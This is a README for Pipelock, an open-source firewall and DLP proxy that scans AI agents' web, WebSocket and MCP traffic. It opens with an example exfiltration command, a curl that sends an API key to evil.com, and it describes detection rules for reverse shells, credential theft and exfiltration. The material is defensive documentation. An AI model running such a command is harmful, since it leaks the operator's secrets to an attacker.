Pipelock

Open-source agent firewall for AI agents. Single binary, zero runtime dependencies.

Your agent has $ANTHROPIC_API_KEY in its environment, plus shell access. One request is all it takes:

curl "https://evil.com/steal?key=$ANTHROPIC_API_KEY"   # game over, unless pipelock is watching

Works with: Claude Code · OpenAI Agents SDK · Google ADK · AutoGen · CrewAI · LangGraph · Cursor

Quick Start · Integration Guides · Docs · Blog

Quick Start

# macOS / Linux
brew install luckyPipewrench/tap/pipelock

# Or download a binary (no dependencies)
# See https://github.com/luckyPipewrench/pipelock/releases

# Or with Docker
docker pull ghcr.io/luckypipewrench/pipelock:latest

# Or from source (requires Go 1.25+)
go install github.com/luckyPipewrench/pipelock/cmd/pipelock@latest

Try it in 30 seconds:

# 1. Generate a config
pipelock generate config --preset balanced > pipelock.yaml

# 2. This should be BLOCKED (DLP catches the fake API key)
pipelock check --config pipelock.yaml --url "https://example.com/?key=sk-ant-api03-fake1234567890"

# 3. This should be ALLOWED (clean URL, no secrets)
pipelock check --config pipelock.yaml --url "https://docs.python.org/3/"

# Edit pipelock.yaml: set forward_proxy.enabled to true
pipelock run --config pipelock.yaml

export HTTPS_PROXY=http://127.0.0.1:8888
export HTTP_PROXY=http://127.0.0.1:8888

# Now every HTTP request flows through pipelock's scanner.
curl "https://example.com/?key=sk-ant-api03-fake1234567890"  # blocked

# Start the proxy (agents connect to localhost:8888/fetch?url=...)
pipelock run --config pipelock.yaml

# For full network isolation (agent can ONLY reach pipelock):
pipelock generate docker-compose --agent claude-code -o docker-compose.yaml
docker compose up

# Verify a downloaded binary
gh attestation verify pipelock_*_linux_amd64.tar.gz --owner luckyPipewrench

# Verify the container image (substitute the release version)
gh attestation verify oci://ghcr.io/luckypipewrench/pipelock:<version> --owner luckyPipewrench

Community Rules

Pipelock supports signed rule bundles for distributable detection patterns. Install the official community bundle for additional DLP, injection, and tool-poison patterns beyond the built-in defaults:

pipelock rules install pipelock-community

Rules are loaded at startup and merged with built-in patterns. Bundles are Ed25519-signed and verified against the embedded keyring, which is present in release binaries (Homebrew, GitHub Releases, Docker). Source builds via go install must add the official public key to trusted_keys in their config. See docs/rules.md for details.

How It Works

Pipelock is an agent firewall: like a WAF for web apps, it sits inline between your AI agent and the internet. It uses capability separation: the agent process (which has secrets) is network-restricted, while Pipelock (which holds no agent secrets) inspects all traffic through an 11-layer scanner pipeline. Deployment (Docker network isolation, Kubernetes NetworkPolicy, etc.) enforces the separation boundary.

Three proxy modes, same port:

• Fetch proxy (/fetch?url=...): Pipelock fetches the URL, extracts text, scans the response for prompt injection, and returns clean content. Best for agents that use a dedicated fetch tool.
• Forward proxy (HTTPS_PROXY): Standard HTTP CONNECT tunneling and absolute-URI forwarding. Agents use Pipelock as their system proxy with zero code changes. Hostname scanning catches blocked domains and SSRF before the tunnel opens. Request body and header DLP scanning catches secrets in POST bodies and auth headers. Optional TLS interception decrypts CONNECT tunnels for full body/header DLP and response injection scanning (requires CA setup via pipelock tls init and pipelock tls install-ca).
• WebSocket proxy (/ws?url=ws://...): Bidirectional frame scanning with DLP + injection detection on text frames. Fragment reassembly, message size limits, idle timeout, and connection lifetime controls are all built in.

flowchart LR
    subgraph PRIV["PRIVILEGED ZONE"]
        Agent["AI Agent\nAPI keys + credentials + source code\nNetwork-isolated by deployment"]
    end

    subgraph FW["FIREWALL ZONE"]
        Proxy["Pipelock\n11-layer scanner pipeline\nNo agent secrets"]
    end

    subgraph NET["INTERNET"]
        Web["APIs + MCP Servers + Web"]
    end

    Agent -- "fetch / CONNECT / ws / MCP" --> Proxy
    Proxy -- "scanned request" --> Web
    Web -- "response" --> Proxy
    Proxy -- "scanned content" --> Agent

    style PRIV fill:#2d1117,stroke:#f85149,color:#e6edf3
    style FW fill:#0d2818,stroke:#3fb950,color:#e6edf3
    style NET fill:#0d1b2e,stroke:#58a6ff,color:#e6edf3
    style Agent fill:#1a1a2e,stroke:#f85149,color:#e6edf3
    style Proxy fill:#0d2818,stroke:#3fb950,color:#e6edf3
    style Web fill:#0d1b2e,stroke:#58a6ff,color:#e6edf3

┌──────────────────────┐         ┌───────────────────────┐
│  PRIVILEGED ZONE     │         │  FIREWALL ZONE        │
│                      │         │                       │
│  AI Agent            │  IPC    │  Pipelock             │
│  - Has API keys      │────────>│  - No agent secrets   │
│  - Has credentials   │ fetch / │  - Full internet      │
│  - Restricted network│ CONNECT │  - Returns text       │
│                      │ /ws     │  - WS frame scanning  │
│                      │<────────│  - URL scanning       │
│  Can reach:          │ content │  - Audit logging      │
│  ✓ api.anthropic.com │         │                       │
│  ✓ discord.com       │         │  Can reach:           │
│  ✗ evil.com          │         │  ✓ Any URL            │
│  ✗ pastebin.com      │         │  But has:             │
└──────────────────────┘         │  ✗ No env secrets     │
                                 │  ✗ No credentials     │
                                 └───────────────────────┘

Why Pipelock?

Full comparison: docs/comparison.md

Security Matrix

Pipelock runs in three modes:

For agents running uncensored or abliterated models (e.g. OBLITERATUS), the hostile-model preset layers additional defenses on top of strict mode: aggressive entropy thresholds (3.0), blanket network tool blocking, session binding, cross-request exfiltration detection, and a pre-configured kill switch. pipelock audit recommends this preset when it detects known guardrail-removal toolchains (currently dependency-based detection).

What each mode prevents, detects, or logs:

Honest assessment: Strict mode blocks all outbound HTTP except allowlisted API domains, so there's no exfiltration channel through the proxy. Balanced mode raises the bar from "one curl command" to "sophisticated pre-planned attack." Audit mode gives you visibility you don't have today. Pipelock doesn't sandbox processes or restrict syscalls. It's a content inspection layer. For full defense in depth, pair it with an OS sandbox (see docs/comparison.md).

Features

11-Layer URL Scanner

Every request passes through: scheme validation, CRLF injection detection, path traversal blocking, domain blocklist, DLP pattern matching (44 built-in patterns for API keys, tokens, credentials, and cryptocurrency private keys), path entropy analysis, subdomain entropy analysis, SSRF protection with DNS rebinding prevention, per-domain rate limiting, URL length limits, and per-domain data budgets.

DLP runs before DNS resolution, designed to catch secrets before any DNS query leaves the proxy. BIP-39 seed phrase detection uses a dedicated scanner with dictionary lookup, sliding window matching, and SHA-256 checksum validation to catch cryptocurrency mnemonic exfiltration across all transport surfaces.

See docs/bypass-resistance.md for the full evasion test matrix.

Response Scanning

Fetched content is scanned for prompt injection before reaching the agent. A 6-pass normalization pipeline catches zero-width character evasion, homoglyph substitution, leetspeak encoding, and base64-wrapped payloads. Actions: block, strip, warn, or ask (human-in-the-loop terminal approval).

MCP Proxy

Wraps any MCP server with bidirectional scanning. Three transport modes: stdio subprocess wrapping, Streamable HTTP bridging, and HTTP reverse proxy. Scans both directions: client requests checked for DLP leaks, server responses scanned for injection, and tools/list responses checked for poisoned descriptions and mid-session rug-pull changes.

# Wrap a local MCP server (stdio)
pipelock mcp proxy --config pipelock.yaml -- npx -y @modelcontextprotocol/server-filesystem /tmp

# Proxy a remote MCP server (HTTP)
pipelock mcp proxy --upstream http://localhost:8080/mcp

# Combined mode (fetch/forward proxy + MCP on separate ports)
pipelock run --config pipelock.yaml --mcp-listen 0.0.0.0:8889 --mcp-upstream http://localhost:3000/mcp

MCP Tool Policy

Pre-execution rules that block dangerous tool calls before they reach MCP servers. Ships with 17 built-in rules covering destructive operations, credential access, reverse shells, persistence mechanisms, and encoded command execution. Shell obfuscation detection is built-in.

Tool Call Chain Detection

Detects attack patterns in sequences of MCP tool calls. Ships with 10 built-in patterns covering reconnaissance, credential theft, data staging, persistence, and exfiltration chains. Uses subsequence matching with configurable gap tolerance, so inserting innocent calls between attack steps doesn't evade detection.

Kill Switch

Emergency deny-all with four independent activation sources: config file, SIGUSR1, sentinel file, and remote API. Any one active blocks all traffic. The API can run on a separate port so agents can't deactivate their own kill switch.

# Activate from operator machine
curl -X POST http://localhost:9090/api/v1/killswitch \
  -H "Authorization: Bearer TOKEN" -d '{"active": true}'

Scan API

Evaluation endpoint for programmatic scanning. Any tool, pipeline, or control plane can submit URLs, text, or tool calls and get a structured verdict back — the proxy doesn't need to be in the request path. Four scan kinds: url, dlp, prompt_injection, and tool_call. Returns findings with scanner type, rule ID, and severity. Bearer token auth, per-token rate limiting, and Prometheus metrics.

See docs/scan-api.md for the full API reference.

Address Protection

Detects blockchain address poisoning attacks where a lookalike address is substituted for a legitimate one. Validates addresses for ETH, BTC, SOL, and BNB chains, compares against a user-supplied allowlist, and flags similar addresses using prefix/suffix fingerprinting. Designed for agents that interact with DeFi protocols or execute transactions.

Event Emission

Forward audit events to external systems (SIEM, webhook receivers, syslog). Events are fire-and-forget and never block the proxy. Each event includes a MITRE ATT&CK technique ID where applicable (T1048 for exfiltration, T1059 for injection, T1195.002 for supply chain).

See docs/guides/siem-integration.md for log schema, forwarding patterns, and example SIEM queries.

More Features

Configuration

Generate a starter config, or use one of the 7 presets:

pipelock generate config --preset balanced > pipelock.yaml
pipelock audit ./my-project -o pipelock.yaml  # tailored to your project

Config changes are picked up automatically via file watcher or SIGHUP (most fields hot-reload without restart).

Full reference with all fields, defaults, and hot-reload behavior: docs/configuration.md

Integration Guides

• Claude Code: MCP proxy setup, .claude.json configuration
• OpenAI Agents SDK: MCPServerStdio, multi-agent handoffs
• Google ADK: McpToolset, StdioConnectionParams
• AutoGen: StdioServerParams, mcp_server_tools()
• CrewAI: MCPServerStdio wrapping, MCPServerAdapter
• LangGraph: MultiServerMCPClient, StateGraph
• Cursor: use configs/cursor.yaml with the same MCP proxy pattern as Claude Code
• OpenClaw: Gateway sidecar, init container, generate mcporter config wrapping

CI Integration

GitHub Action

Scan your project for agent security risks on every PR. No Go toolchain needed.

# .github/workflows/pipelock.yaml
- uses: luckyPipewrench/pipelock@v1
  with:
    scan-diff: 'true'
    fail-on-findings: 'true'

The action downloads a pre-built binary, runs pipelock audit on your project, scans the PR diff for leaked secrets, and uploads the audit report as a workflow artifact. Critical findings produce inline annotations on the PR diff.

See examples/ci-workflow.yaml for a complete workflow.

Reusable Workflow

For even simpler adoption, call the reusable workflow directly:

# .github/workflows/security.yaml
jobs:
  pipelock:
    uses: luckyPipewrench/pipelock/.github/workflows/reusable-scan.yml@v1
    with:
      fail-on-critical: true

That's the entire workflow. Everything else is defaults: auto-generated config, PR diff scanning, artifact upload.

Deployment

# Docker
docker pull ghcr.io/luckypipewrench/pipelock:latest
docker run -p 8888:8888 -v ./pipelock.yaml:/config/pipelock.yaml:ro \
  ghcr.io/luckypipewrench/pipelock:latest \
  run --config /config/pipelock.yaml --listen 0.0.0.0:8888

# Network-isolated agent (Docker Compose)
pipelock generate docker-compose --agent claude-code -o docker-compose.yaml
docker compose up

For production deployment recipes (Docker Compose with network isolation, Kubernetes sidecar + NetworkPolicy, iptables/nftables, macOS PF): docs/guides/deployment-recipes.md

# Fetch a URL (returns extracted text content)
curl "http://localhost:8888/fetch?url=https://example.com"

# Forward proxy (when forward_proxy.enabled: true)
# Set HTTPS_PROXY=http://localhost:8888 and use any HTTP client normally.
curl -x http://localhost:8888 https://example.com

# WebSocket proxy (when websocket_proxy.enabled: true)
# wscat -c "ws://localhost:8888/ws?url=ws://upstream:9090/path"

# Health check
curl "http://localhost:8888/health"

# Prometheus metrics
curl "http://localhost:8888/metrics"

# JSON stats (top blocked domains, scanner hits, tunnels, block rate)
curl "http://localhost:8888/stats"

# Kill switch API (when api_listen is set, use that port instead)
curl -X POST http://localhost:9090/api/v1/killswitch \
  -H "Authorization: Bearer TOKEN" -d '{"active": true}'
curl http://localhost:9090/api/v1/killswitch/status \
  -H "Authorization: Bearer TOKEN"

{
  "url": "https://example.com",
  "agent": "my-bot",
  "status_code": 200,
  "content_type": "text/html",
  "title": "Example Domain",
  "content": "This domain is for use in illustrative examples...",
  "blocked": false
}

{
  "status": "healthy",
  "version": "x.y.z",
  "mode": "balanced",
  "uptime_seconds": 3600.5,
  "dlp_patterns": 44,
  "response_scan_enabled": true,
  "kill_switch_active": false
}

Docs

Project Structure

cmd/pipelock/          CLI entry point
internal/
  cli/                 20+ Cobra commands (run, check, generate, mcp, integrity, ...)
  config/              YAML config, validation, defaults, hot-reload (fsnotify)
  scanner/             11-layer URL scanning pipeline + response injection detection
  audit/               Structured JSON logging (zerolog) + event emission dispatch
  proxy/               HTTP proxy: fetch, forward (CONNECT), WebSocket, DNS pinning, TLS interception
  certgen/             ECDSA P-256 CA + leaf certificate generation, cache
  mcp/                 MCP proxy + bidirectional scanning + tool poisoning + chains
  killswitch/          Emergency deny-all (4 sources) + port-isolated API
  emit/                Event emission (webhook + syslog sinks)
  metrics/             Prometheus metrics + JSON stats
  normalize/           Unicode normalization (NFKC, confusables, combining marks)
  integrity/           SHA256 file integrity monitoring
  signing/             Ed25519 key management
  gitprotect/          Git diff scanning for secrets
  hitl/                Human-in-the-loop terminal approval
  report/              HTML/JSON audit report generation from JSONL event logs
  projectscan/         Project directory scanning for audit command
  addressprotect/      Blockchain address validation and poisoning detection
  seedprotect/         BIP-39 seed phrase detection (dictionary, sliding window, checksum)
  rules/               Community rule bundle loading, verification, and CLI
enterprise/            Multi-agent features (ELv2, see enterprise/LICENSE)
configs/               7 preset config files
docs/                  Guides, references, compliance mappings

Testing

Pipelock is tested like a security product, not just a developer tool. The open-source core is covered by thousands of unit, integration, and end-to-end tests across the proxy, scanner, MCP, WebSocket, and policy layers. In addition, we maintain a separate private adversarial test suite that exercises real-world attack classes against the production binary.

That suite covers the problems an agent firewall actually has to stop: secret exfiltration, prompt injection, SSRF, tool poisoning, and transport-layer evasions across HTTP, WebSocket, and MCP. We publish the methodology and coverage areas; we do not publish live bypass payloads that would lower attacker cost. Every bypass graduates into a regression test before release.

This is not security through obscurity. Pipelock's detection and enforcement logic is open source and inspectable. Public tests remain extensive. The private adversarial suite exists to continuously regression-test bypass classes without handing out a replay script.

For more detail on the security model, trust boundaries, and known limitations, see the Security Assurance Case.

Metrics

Canonical metrics, updated each release.

Run make test to verify locally. Performance data: docs/performance.md. Raw benchmarks: docs/benchmarks.md.

Independent benchmark: agent-egress-bench (72 attack cases across 8 categories, tool-neutral).

Credits

• Architecture influenced by Anthropic's Claude Code sandboxing and sandbox-runtime
• Threat model informed by OWASP Agentic AI Top 10
• See docs/comparison.md for how Pipelock relates to other tools in this space
• Security review contributions from Dylan Corrales

Contributions welcome. See CONTRIBUTING.md for guidelines.

If Pipelock is useful, please star this repository. It helps others find the project.

License

Pipelock core is licensed under the Apache License 2.0. Copyright 2026 Joshua Waldrep.

Multi-agent features (per-agent identity, budgets, and configuration isolation) are gated by the enterprise build tag and licensed under the Elastic License 2.0 (ELv2). The primary implementation is in the enterprise/ directory, with build-tag-gated integration code in cmd/ and internal/. These features require a valid enterprise license key.

The open-source core works independently without enterprise features.

Pre-built release artifacts (Homebrew, GitHub releases, Docker images) include enterprise code that activates with a valid license key. Building from source with go install or the repository Dockerfile produces a Community-only binary.

See LICENSE for the Apache 2.0 text and enterprise/LICENSE for the ELv2 text.